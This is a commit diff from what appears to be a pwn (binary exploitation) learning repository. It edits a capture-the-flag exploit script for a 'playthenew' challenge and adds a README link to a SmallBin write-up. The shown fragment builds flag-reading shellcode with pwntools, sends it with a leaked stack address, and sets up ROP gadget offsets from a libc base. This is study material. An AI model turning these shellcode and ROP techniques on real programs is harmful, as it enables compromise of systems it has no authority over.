Update OtherBin/playthenew and README
This commit is contained in:
@@ -120,8 +120,6 @@ shellcode = shellcraft.amd64.linux.cat2('flag')
|
||||
secret(p64(0) + p64(gets) + p64(leak_stack - 0x110) + asm(shellcode))
|
||||
backdoor()
|
||||
|
||||
raw_input()
|
||||
|
||||
pop_rdi_ret = 0x000000000002164f + libc_base
|
||||
pop_rsi_ret = 0x0000000000023a6a + libc_base
|
||||
pop_rdx_ret = 0x0000000000001b96 + libc_base
|
||||
|
||||
@@ -53,3 +53,5 @@ A pwn learning repo containing multiple pwn program codes.
|
||||
[Pwn学习总结(25):_IO_FILE – io_leak](https://renjikai.com/pwn-learning-summary-25/)
|
||||
|
||||
[Pwn学习总结(26):TCache – tcache231](https://renjikai.com/pwn-learning-summary-26/)
|
||||
|
||||
[Pwn学习总结(27):SmallBin – playthenew](https://renjikai.com/pwn-learning-summary-27/)
|
||||
|
||||
Reference in New Issue
Block a user